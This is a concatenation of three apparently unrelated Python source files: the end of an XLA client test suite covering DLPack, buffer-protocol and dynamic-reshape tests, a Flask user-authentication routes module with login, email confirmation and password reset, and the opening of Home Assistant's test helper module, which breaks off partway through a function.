  def testInvokeWithWrongElementType(self):
    # Executing with an f32 argument against an s32 parameter must fail.
    builder = self._NewComputation()
    builder.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
    ops.Parameter(builder, 0,
                  xla_client.shape_from_pyval(self.s32_scalar_2))
    builder.clear_op_metadata()

    def TestFun():
      return xla_client.execute_with_python_values(
          self.backend.compile(builder.build()), [self.f32_scalar_2],
          self.backend)

    self.assertRaisesRegex(
        RuntimeError, r"Invalid argument: Argument does not match.*"
        r"want s32\[\], got f32\[\].*", TestFun)
# Register EmbeddedComputationsTest with the suite list.
# NOTE(review): ErrorTest (defined just above) is never appended to `tests`
# anywhere in this region, so it would not run via this factory — confirm
# whether that omission is intentional.
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
  """Tests related to setting the root of the computation."""

  def testComputationRootDifferentFromLastOp(self):
    # Passing an op to build() makes it the root, even though a later op
    # (the second Add) was recorded afterwards.
    builder = self._NewComputation()
    x = ops.Parameter(builder, 0,
                      xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
    root = ops.Add(x, ops.Constant(builder, np.float32(3.14)))
    ops.Add(root, ops.Constant(builder, np.float32(1.618)))

    arg = NumpyArrayF32(1.0)
    compiled_c = self.backend.compile(builder.build(root))
    ans, = xla_client.execute_with_python_values(
        compiled_c, [arg], backend=self.backend)
    np.testing.assert_allclose(ans, 4.14)
# Register ComputationRootTest with the suite list returned by this factory.
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
  """Tests related to set OpSharding."""

  def testSetSharding(self):
    # Attach a REPLICATED sharding annotation to the parameter, clear it,
    # and check the computation still executes normally with `result` as
    # the explicitly-chosen root.
    builder = self._NewComputation()
    sharding = xla_client.OpSharding()
    sharding.type = sharding.type.REPLICATED
    sharding.tile_assignment_dimensions.extend([1])
    sharding.tile_assignment_devices.extend([0])
    builder.set_sharding(sharding)
    x = ops.Parameter(builder, 0,
                      xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
    builder.clear_sharding()

    result = ops.Add(x, ops.Constant(builder, np.float32(3.14)))
    ops.Add(result, ops.Constant(builder, np.float32(1.618)))
    arg = NumpyArrayF32(1.0)
    compiled_c = self.backend.compile(builder.build(result))
    ans, = xla_client.execute_with_python_values(
        compiled_c, [arg], backend=self.backend)
    np.testing.assert_allclose(ans, 4.14)
# Register SetShardingTest with the suite list returned by this factory.
tests.append(SetShardingTest)
# Array shapes exercised by the DLPack round-trip tests below: scalar,
# vectors, matrices (including zero-sized dimensions), and 3-D shapes with
# size-1 dimensions in different positions.
testcase_shapes = [
    (),
    (1,),
    (2, 3),
    (2, 0),
    (0, 7),
    (4, 1, 2),
    (2, 1, 3),
    (2, 4, 1),
    (3, 1),
    (1, 3),
]
def FormatShapeAndDtype(shape, dtype):
  """Return a test-name suffix like "_float32[2,3]" for a shape/dtype pair."""
  dims = ",".join(str(dim) for dim in shape)
  return "_{}[{}]".format(np.dtype(dtype).name, dims)
class DLPackTest(parameterized.TestCase):
  """Round-trip and ownership tests for DLPack interop with device buffers."""

  def setUp(self):
    super(DLPackTest, self).setUp()
    self.backend = xla_backend()
    if self.backend.platform not in ("cpu", "gpu"):
      self.skipTest("DLPack requires CPU or GPU")

  # pylint: disable=g-complex-comprehension
  # pyformat: disable
  @parameterized.named_parameters({
      "testcase_name": "{}_own={}".format(FormatShapeAndDtype(shape, dtype),
                                          take_ownership),
      "dtype": dtype,
      "shape": shape,
      "take_ownership": take_ownership
  } for dtype in dlpack_dtypes for shape in testcase_shapes
    for take_ownership in [False, True])
  # pyformat: enable
  def testRoundTrip(self, dtype, shape, take_ownership):
    """Array -> device buffer -> DLPack capsule -> buffer keeps the values."""
    if dtype == np.bool_:
      x = np.random.randint(0, 2, size=shape).astype(np.bool_)
    else:
      x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
    buffer = self.backend.buffer_from_pyval(x)
    dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=take_ownership)
    del buffer  # Free "buffer" to make sure dlt retains ownership.
    self.assertEqual(type(dlt).__name__, "PyCapsule")
    y = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
    # Booleans are compared as uint8 after the round trip.
    np.testing.assert_array_equal(
        x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())

  def testTensorsCanBeConsumedOnceOnly(self):
    """Converting the same DLPack capsule twice must raise."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=True)

    def ConsumeDLPackTensor():
      _ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)

    ConsumeDLPackTensor()
    self.assertRaisesRegex(
        RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
        ConsumeDLPackTensor)

  def testTensorsCanBeOwnedOnceOnly(self):
    """take_ownership=True deletes the buffer; a second export must fail."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    _ = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=True)
    self.assertTrue(buffer.is_deleted())
    with self.assertRaisesRegex(
        RuntimeError,
        "Cannot convert deleted/invalid buffer to DLPack tensor.*"):
      _ = xla_client._xla.buffer_to_dlpack_managed_tensor(
          buffer, take_ownership=True)

  def testNonOwnedDlpackCanBeViewedTwice(self):
    """take_ownership=False leaves the buffer alive for multiple views."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=False)
    d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=False)

    y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
    z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
    del d1, d2
    # Original buffer and both views must all still read back correctly.
    np.testing.assert_array_equal(x, buffer.to_py())
    np.testing.assert_array_equal(x, y.to_py())
    np.testing.assert_array_equal(x, z.to_py())


tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
  """Tests of the Python buffer-protocol (zero-copy) view of CPU buffers."""

  def setUp(self):
    super(BufferProtocolTest, self).setUp()
    self.backend = xla_backend()
    if self.backend.platform != "cpu":
      self.skipTest("Test requires CPU")

  # pylint: disable=g-complex-comprehension
  @parameterized.named_parameters({
      "testcase_name": FormatShapeAndDtype(shape, dtype),
      "dtype": dtype,
      "shape": shape
  } for dtype in standard_dtypes if dtype != bfloat16
    for shape in testcase_shapes)
  def testRoundTrip(self, dtype, shape):
    """ZERO_COPY buffers alias host memory; DURING_CALL buffers copy."""
    x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
    x_ptr = x.__array_interface__["data"][0]
    buffer = self.backend.buffer_from_pyval(
        x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
    y = np.array(buffer, copy=False)
    y_ptr = y.__array_interface__["data"][0]
    np.testing.assert_array_equal(x, y)

    # If the input was sufficiently aligned, the input and output should
    # alias.
    self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
    self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())

    during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
    buffer2 = self.backend.buffer_from_pyval(
        x, host_buffer_semantics=during_call)
    z = np.array(buffer2, copy=False)
    # DURING_CALL semantics must copy, so the pointers must differ.
    self.assertNotEqual(x.__array_interface__["data"][0],
                        z.__array_interface__["data"][0])

  def testDeleteWithActiveView(self):
    """Deleting a buffer while a NumPy view exists must not free the data."""
    x = np.random.randn(20, 10)
    buffer = self.backend.buffer_from_pyval(x)
    buffer_ptr = buffer.unsafe_buffer_pointer()
    y = np.array(buffer, copy=False)
    buffer.delete()
    # It is still legal to access `y`; the array view must keep it alive.
    np.testing.assert_array_equal(x, y)
    self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)


tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
  """Tests for attaching Python tracebacks to buffers and executables."""

  def setUp(self):
    super(TracebackTest, self).setUp()
    self.backend = xla_backend()

  def testNoTracebacksIfDisabled(self):
    """With tracebacks disabled, objects carry no creation traceback."""
    with xla_client.tracebacks(enabled=False):
      self.assertEqual(None, xla_client.Traceback.get_traceback())
      buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
      self.assertEqual(None, buffer.traceback)

      b = xla_client.XlaBuilder("computation")
      ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
      e = self.backend.compile(b.build())
      self.assertEqual(None, e.traceback)

  def assertIsTracebackContaining(self, tb, function):
    """Assert `tb` is a Traceback with a frame named `function`."""
    self.assertIsInstance(tb, xla_client.Traceback)
    self.assertIn(function, str(tb))
    self.assertTrue(any(f.function_name == function for f in tb.frames))

  def testTracebacks(self):
    """With tracebacks enabled, objects record where they were created."""
    with xla_client.tracebacks(enabled=True):
      tb = xla_client.Traceback.get_traceback()
      self.assertIsTracebackContaining(tb, "testTracebacks")

      # Tracebacks are not implemented on the TPU driver extension's variant
      # of buffers and executables.
      if not isinstance(self.backend, xla_client.Client):
        return

      buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
      self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")

      b = xla_client.XlaBuilder("computation")
      ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
      e = self.backend.compile(b.build())
      self.assertIsTracebackContaining(e.traceback, "testTracebacks")

  def testNestedFunction(self):
    """Frames are ordered innermost-first around AFunction."""

    def AFunction():

      def AnotherFunction():
        return xla_client.Traceback.get_traceback()

      return AnotherFunction()

    with xla_client.tracebacks(enabled=True):
      tb = AFunction()
      self.assertIsInstance(tb, xla_client.Traceback)
      frames = tb.frames
      i = next(
          i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
      self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
      self.assertEqual(frames[i + 1].function_name, "testNestedFunction")


tests.append(TracebackTest)
class ClientTest(parameterized.TestCase):
  """Tests of the backend/client API surface itself."""

  def setUp(self):
    super(ClientTest, self).setUp()
    self.backend = xla_backend()

  def testPlatformVersion(self):
    """CPU reports "<unknown>"; GPU reports a "cuda NNNN" version string."""
    version = self.backend.platform_version
    if self.backend.platform == "cpu":
      self.assertEqual(version, "<unknown>")
    elif self.backend.platform == "gpu":
      # Following is false if not built with --config=cuda
      if test_util.is_gpu_available(cuda_only=True):
        self.assertTrue(
            re.match(r"^cuda \d{4,}$", version),
            msg=f"Expected CUDA version string; got {repr(version)}")
      else:
        self.assertEqual(version, "<unknown>")


tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
  """Tests related to DynamicReshape."""

  def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
                                    test_fn):
    """Execute `builder` on `args`; check outputs via to_py and memoryview."""
    compiled = self.backend.compile(builder.build())
    output_buffers = compiled.execute([
        self.backend.buffer_from_pyval(
            arg, device=compiled.local_devices()[0]) for arg in args
    ])
    self.assertLen(output_buffers, len(expected_results))
    for buf, expected in zip(output_buffers, expected_results):
      to_py_result = buf.to_py()
      self.assertEqual(expected.shape, to_py_result.shape)
      test_fn(expected, to_py_result)
      if self.backend.platform == "cpu" and buf.dtype != bfloat16:
        mview = memoryview(buf)
        self.assertEqual(expected.shape, mview.shape)
        test_fn(expected, np.asarray(mview))
      else:
        # Buffer protocol expected to fail on non-cpu platforms and bfloat16
        # Note that np.asarray(buf) doesn't throw an exception. To test if the
        # error was thrown properly we must use memoryview(buf).
        with self.assertRaises(BufferError):
          memoryview(buf)

  # 1D reshape of full size, half size, and size of 0.
  @unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
  @parameterized.parameters((5), (3), (0))
  def testReshape1D(self, reshape_size):
    """Reshape iota(5) down to a runtime-provided dynamic length."""
    full_size = 5
    c = self._NewComputation()
    arg = np.array(reshape_size, dtype=np.int32)
    expected = np.array(range(reshape_size), dtype=np.int32)
    p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
    ops.DynamicReshape(
        ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
        [True])
    self._CompareToPyAndBufferProtocol(c, [arg], [expected],
                                       np.testing.assert_equal)

  # 2D reshape with a slice on the minor dimension. We test different types
  # where the strides may differ between the host and devices. The reshaped
  # physical memory layout is not consecutive, and we test if the program can
  # return the correct logical view of the data.
  @unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes + float_dtypes)
  def testReshape2D(self, dtype):
    """Slice the minor dimension to a dynamic size of 2."""
    arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
    arg1 = np.array(2, dtype=np.int32)
    expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
    c = self._NewComputation()
    p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
    p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
    ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
    self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
                                       np.testing.assert_equal)

  @unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes + float_dtypes)
  def testDynamicShapeArgs(self, dtype):
    """Pass a dynamically-sized array into a Reduce subcomputation."""
    full_size = 10
    dynamic_shape_size = 4
    # subcomputation 1: scalar addition, used as the Reduce combiner.
    binary_add_builder = self._NewComputation()
    scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
    ops.Add(
        ops.Parameter(binary_add_builder, 0, scalar_shape),
        ops.Parameter(binary_add_builder, 1, scalar_shape))
    # subcomputation 2: reduce over a dynamically-sized dimension.
    reshape_reduce_builder = self._NewComputation()
    dshape = xla_client.Shape.array_shape(
        np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
    reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
    ops.Reduce(
        reshape_reduce_builder,
        operands=[reshape_reduce_p],
        init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
        computation=binary_add_builder.build(),
        dimensions_to_reduce=[0])
    # main computation: sum(range(full_size)[:dynamic_shape_size])
    c = self._NewComputation()
    arg = np.array(dynamic_shape_size, dtype=np.int32)
    p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
    reshaped = ops.DynamicReshape(
        ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
        [full_size], [True])
    ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
    self._ExecuteAndCompareClose(c, [arg], [dtype(6)])  # 0 + 1 + 2 + 3


tests.append(DynamicReshapeTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
  """Materialize the classes from TestFactory into `globals_dict`.

  Wraps `backend_fn` in an unbounded LRU cache so that a single backend
  instance is shared by all tests.
  """
  # Avoid creating a new backend per test (this causes GPU OOM, and is probably
  # inefficient).
  cached_backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
  for base_class in TestFactory(cached_backend_fn, **kw):
    test_name = test_prefix + base_class.__name__
    test_class = type(test_name, (base_class,), {})
    # Clean up the qualified names of the tests to not include the test factory.
    test_class.__qualname__ = test_class.__name__
    globals_dict[test_name] = test_class
if __name__ == "__main__":
  # Allow selecting the target backend from the command line (e.g.
  # --backend=gpu); defaults to the local CPU client.
  flags.DEFINE_string("backend", "cpu", "Target backend.")
  InstantiateTests(globals(),
                   lambda: xla_client.get_local_backend(FLAGS.backend))
  absltest.main()
|
routes.py | from . import users_blueprint
from flask import render_template, flash, abort, request, current_app, redirect, url_for
from .forms import RegistrationForm, LoginForm, EmailForm, PasswordForm, ChangePasswordForm
from project.models import User
from project import database, mail
from sqlalchemy.exc import IntegrityError
from flask import escape
from flask_login import login_user, current_user, login_required, logout_user
from urllib.parse import urlparse
from flask_mail import Message
from flask import copy_current_request_context
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from itsdangerous.exc import BadSignature
from datetime import datetime
################
#### routes ####
################
@users_blueprint.route('/about')
def about():
    """Render the static about page with a flashed greeting."""
    flash('Thanks for learning about this site!', 'info')
    return render_template('users/about.html', company_name='saidulislam.com')


@users_blueprint.route('/admin')
def admin():
    """Placeholder admin page; always forbidden (exercises the 403 handler)."""
    abort(403)


@users_blueprint.errorhandler(403)
def page_forbidden(e):
    """Render the custom 403 (forbidden) error page."""
    return render_template('users/403.html'), 403
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
    """Register a new user and email them a confirmation link.

    GET renders the registration form; POST validates it, creates the user,
    and sends the confirmation email on a background thread so the request
    is not blocked by SMTP.  Duplicate emails roll back the transaction.
    """
    form = RegistrationForm()
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                new_user = User(form.email.data, form.password.data)
                database.session.add(new_user)
                database.session.commit()
                flash(f'Thanks for registering, {new_user.email}! Please check your email to confirm your email address.', 'success')
                current_app.logger.info(f'Registered new user: {form.email.data}!')

                @copy_current_request_context
                def send_email(message):
                    # copy_current_request_context lets the worker thread use
                    # the request context; the app context is pushed for mail.
                    with current_app.app_context():
                        mail.send(message)

                # Send an email confirming the new registration - Updated!
                msg = generate_confirmation_email(form.email.data)
                email_thread = Thread(target=send_email, args=[msg])
                email_thread.start()

                return redirect(url_for('users.login'))
            except IntegrityError:
                # Email is unique in the schema; undo the failed INSERT.
                database.session.rollback()
                flash(f'ERROR! Email ({form.email.data}) already exists.', 'error')
        else:
            # Fix: plain string (the f-string had no placeholders) and an
            # explicit 'error' category, consistent with the other error
            # flashes in this module.
            flash('Error in form data!', 'error')

    return render_template('users/register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate a user and redirect, guarding against open redirects."""
    # If the user is already logged in, don't allow them to try to log in again
    if current_user.is_authenticated:
        flash('Already logged in!')
        current_app.logger.info(f'Duplicate login attempt by user: {current_user.email}')
        return redirect(url_for('stocks.index'))

    form = LoginForm()
    if request.method == 'POST':
        if form.validate_on_submit():
            user = User.query.filter_by(email=form.email.data).first()

            if user and user.is_password_correct(form.password.data):
                # User's credentials have been validated, so log them in
                login_user(user, remember=form.remember_me.data)
                flash(f'Thanks for logging in, {current_user.email}!')
                current_app.logger.info(f'Logged in user: {current_user.email}')

                # If the next URL is not specified, redirect to the user profile - NEW!!
                if not request.args.get('next'):
                    return redirect(url_for('users.user_profile'))

                # Process the query to determine if the user should be redirected after logging in - NEW!!
                next_url = request.args.get('next')
                # Open-redirect guard: only relative paths (no scheme and no
                # host) are accepted; anything absolute aborts the login.
                if urlparse(next_url).scheme != '' or urlparse(next_url).netloc != '':
                    current_app.logger.info(f'Invalid next path in login request: {next_url}')
                    logout_user()
                    return abort(400)

                current_app.logger.info(f'Redirecting after valid login to: {next_url}')
                return redirect(next_url)

        # Reached on form validation failure or bad credentials.
        flash('ERROR! Incorrect login credentials.')
    return render_template('users/login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
    """Log the current user out and return to the index page."""
    # Log before logout_user(), while current_user still holds the real user.
    current_app.logger.info(f'Logged out user: {current_user.email}')
    logout_user()
    flash('Goodbye!')
    return redirect(url_for('stocks.index'))


@users_blueprint.route('/profile')
@login_required
def user_profile():
    """Render the profile page for the logged-in user."""
    return render_template('users/profile.html')
def generate_confirmation_email(user_email):
    """Build the email-confirmation Message for `user_email`.

    The confirmation URL embeds a signed, salted token so the confirm
    endpoint can verify both authenticity and age.
    """
    serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
    token = serializer.dumps(user_email, salt='email-confirmation-salt')
    confirm_url = url_for('users.confirm_email', token=token, _external=True)
    html_body = render_template('users/email_confirmation.html',
                                confirm_url=confirm_url)
    return Message(subject='Flask Stock Portfolio App - Confirm Your Email Address',
                   html=html_body,
                   recipients=[user_email])
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
    """Confirm a user's email address from a signed, time-limited token.

    The token is signed with itsdangerous and expires after one hour
    (max_age=3600).  Invalid/expired tokens and tokens for unknown users
    are logged and redirected back to the login page.
    """
    try:
        confirm_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
        email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
    except BadSignature:
        flash('The confirmation link is invalid or has expired.', 'error')
        current_app.logger.info(f'Invalid or expired confirmation link received from IP address: {request.remote_addr}')
        return redirect(url_for('users.login'))

    user = User.query.filter_by(email=email).first()

    # Fix: a valid token may reference a user that has since been deleted;
    # previously this raised AttributeError on `user.email_confirmed`.
    if user is None:
        flash('The confirmation link is invalid or has expired.', 'error')
        current_app.logger.info(f'Confirmation link received for a non-existent user: {email}')
        return redirect(url_for('users.login'))

    if user.email_confirmed:
        flash('Account already confirmed. Please login.', 'info')
        current_app.logger.info(f'Confirmation link received for a confirmed user: {user.email}')
    else:
        user.email_confirmed = True
        user.email_confirmed_on = datetime.now()
        database.session.add(user)
        database.session.commit()
        flash('Thank you for confirming your email address!', 'success')
        current_app.logger.info(f'Email address confirmed for: {user.email}')

    return redirect(url_for('stocks.index'))
@users_blueprint.route('/password_reset_via_email', methods=['GET', 'POST'])
def password_reset_via_email():
    """Send a password-reset link to a confirmed email address."""
    form = EmailForm()
    if form.validate_on_submit():
        user = User.query.filter_by(email=form.email.data).first()

        if user is None:
            flash('Error! Invalid email address!', 'error')
            return render_template('users/password_reset_via_email.html', form=form)

        if user.email_confirmed:
            @copy_current_request_context
            def send_email(email_message):
                with current_app.app_context():
                    mail.send(email_message)

            # Send the password-reset email on a background thread so the
            # request is not blocked by SMTP.
            message = generate_password_reset_email(form.email.data)
            email_thread = Thread(target=send_email, args=[message])
            email_thread.start()

            flash('Please check your email for a password reset link.', 'success')
        else:
            flash('Your email address must be confirmed before attempting a password reset.', 'error')
        return redirect(url_for('users.login'))

    return render_template('users/password_reset_via_email.html', form=form)
def generate_password_reset_email(user_email):
    """Build the password-reset Message for `user_email`.

    The reset URL embeds a signed, salted token checked by
    process_password_reset_token().
    """
    serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
    token = serializer.dumps(user_email, salt='password-reset-salt')
    password_reset_url = url_for('users.process_password_reset_token',
                                 token=token,
                                 _external=True)
    html_body = render_template('users/email_password_reset.html',
                                password_reset_url=password_reset_url)
    return Message(subject='Flask Stock Portfolio App - Password Reset Requested',
                   html=html_body,
                   recipients=[user_email])
@users_blueprint.route('/password_reset_via_token/<token>', methods=['GET', 'POST'])
def process_password_reset_token(token):
    """Validate a password-reset token and let the user set a new password.

    The token is signed with itsdangerous and expires after one hour
    (max_age=3600).
    """
    try:
        password_reset_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
        email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
    except BadSignature:
        flash('The password reset link is invalid or has expired.', 'error')
        # Consistency fix: log rejected tokens like confirm_email() does.
        current_app.logger.info(f'Invalid or expired password reset link received from IP address: {request.remote_addr}')
        return redirect(url_for('users.login'))

    form = PasswordForm()
    if form.validate_on_submit():
        user = User.query.filter_by(email=email).first()

        if user is None:
            flash('Invalid email address!', 'error')
            return redirect(url_for('users.login'))

        user.set_password(form.password.data)
        database.session.add(user)
        database.session.commit()
        flash('Your password has been updated!', 'success')
        return redirect(url_for('users.login'))

    return render_template('users/reset_password_with_token.html', form=form)
@users_blueprint.route('/resend_email_confirmation')
def resend_email_confirmation():
    """Stub route; resending the confirmation email is not implemented yet."""
    return '<h1>Page Is Under Construction</h1>'
@users_blueprint.route('/change_password', methods=['GET', 'POST'])
@login_required
def change_password():
    """Let a logged-in user change their password after re-authenticating.

    The current password must be verified before the new one is stored.
    """
    form = ChangePasswordForm()
    if form.validate_on_submit():
        if current_user.is_password_correct(form.current_password.data):
            current_user.set_password(form.new_password.data)
            database.session.add(current_user)
            database.session.commit()
            flash('Password has been updated!', 'success')
            current_app.logger.info(f'Password updated for user: {current_user.email}')
            return redirect(url_for('users.user_profile'))
        else:
            # Consistency fix: error flashes elsewhere in this module pass
            # the 'error' category so templates can style them.
            flash('ERROR! Incorrect user credentials!', 'error')
            current_app.logger.info(f'Incorrect password change for user: {current_user.email}')

    return render_template('users/change_password.html', form=form)
|
common.py | """Test the helper method for writing tests."""
from __future__ import annotations
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
from time import monotonic
import types
from typing import Any, Awaitable, Collection
from unittest.mock import AsyncMock, Mock, patch
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import BLOCK_LOG_TIMEOUT, State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.uuid as uuid_util
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
# Every HomeAssistant instance created by the helpers below is tracked here
# and removed again on EVENT_HOMEASSISTANT_CLOSE (see clear_instance).
INSTANCES = []
# OAuth-style client id/redirect used by auth-related tests.
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
    """Create threadsafe functions out of callbacks.

    Callback needs to have `hass` as first argument.
    """

    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Run the wrapped callback on the hass event loop and wait for it."""
        hass = args[0]
        call = ft.partial(func, *args, **kwargs)
        future = run_callback_threadsafe(hass.loop, call)
        return future.result()

    return wrapper
def threadsafe_coroutine_factory(func):
    """Create threadsafe functions out of coroutine.

    Callback needs to have `hass` as first argument.
    """

    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Schedule the coroutine on the hass loop and block for the result."""
        hass = args[0]
        future = asyncio.run_coroutine_threadsafe(func(*args, **kwargs), hass.loop)
        return future.result()

    return wrapper
def get_test_config_dir(*add_path):
    """Return a path to a test config dir, optionally joined with *add_path."""
    base_dir = os.path.dirname(__file__)
    return os.path.join(base_dir, "testing_config", *add_path)
def get_test_home_assistant():
    """Return a Home Assistant object pointing at test config directory.

    The event loop runs on a dedicated daemonless thread; hass.start/stop
    are replaced with threadsafe wrappers that drive that loop.
    """
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    hass = loop.run_until_complete(async_test_home_assistant(loop))

    loop_stop_event = threading.Event()

    def run_loop():
        """Run event loop."""
        # pylint: disable=protected-access
        loop._thread_ident = threading.get_ident()
        loop.run_forever()
        loop_stop_event.set()

    orig_stop = hass.stop
    # hass._stopped.set() now stops the loop instead of setting an event.
    hass._stopped = Mock(set=loop.stop)

    def start_hass(*mocks):
        """Start hass."""
        asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()

    def stop_hass():
        """Stop hass, then wait for the loop thread to finish and close it."""
        orig_stop()
        loop_stop_event.wait()
        loop.close()

    hass.start = start_hass
    hass.stop = stop_hass

    threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()

    return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop, load_registries=True):
    """Return a Home Assistant object pointing at test config dir.

    Job/task scheduling is monkeypatched so that plain Mocks are executed
    synchronously (wrapped in a completed Future) instead of being
    scheduled on the loop.
    """
    hass = ha.HomeAssistant()
    store = auth_store.AuthStore(hass)
    hass.auth = auth.AuthManager(hass, store, {}, {})
    ensure_auth_manager_loaded(hass.auth)
    INSTANCES.append(hass)

    orig_async_add_job = hass.async_add_job
    orig_async_add_executor_job = hass.async_add_executor_job
    orig_async_create_task = hass.async_create_task

    def async_add_job(target, *args):
        """Add job."""
        # Unwrap functools.partial chains to find the real target.
        check_target = target
        while isinstance(check_target, ft.partial):
            check_target = check_target.func

        # Plain Mocks run synchronously; AsyncMocks go through the real path.
        if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
            fut = asyncio.Future()
            fut.set_result(target(*args))
            return fut

        return orig_async_add_job(target, *args)

    def async_add_executor_job(target, *args):
        """Add executor job."""
        check_target = target
        while isinstance(check_target, ft.partial):
            check_target = check_target.func

        if isinstance(check_target, Mock):
            fut = asyncio.Future()
            fut.set_result(target(*args))
            return fut

        return orig_async_add_executor_job(target, *args)

    def async_create_task(coroutine):
        """Create task."""
        if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
            fut = asyncio.Future()
            fut.set_result(None)
            return fut

        return orig_async_create_task(coroutine)

